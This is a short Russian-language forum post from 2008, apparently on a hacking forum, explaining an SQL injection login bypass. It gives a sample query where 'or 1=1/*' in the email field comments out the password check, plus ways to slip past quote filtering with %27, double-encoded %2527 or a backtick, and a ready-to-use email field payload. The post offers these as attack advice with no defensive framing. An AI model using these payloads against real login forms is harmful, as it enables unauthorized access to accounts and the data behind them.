27.11.2008, 22:52
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
будет работать когда
SELECT * FROM t_customer WHERE (email='admin@admin.com' or 1=1/*) AND (password='')
обойти фильтр кавычки можна так: %27,%2527,` в разных случаях по разному, тоесть пример
mail:a@a.a%2527 or 1=1/*
pass:
Последний раз редактировалось sabe; 27.11.2008 в 22:54..
|
|
|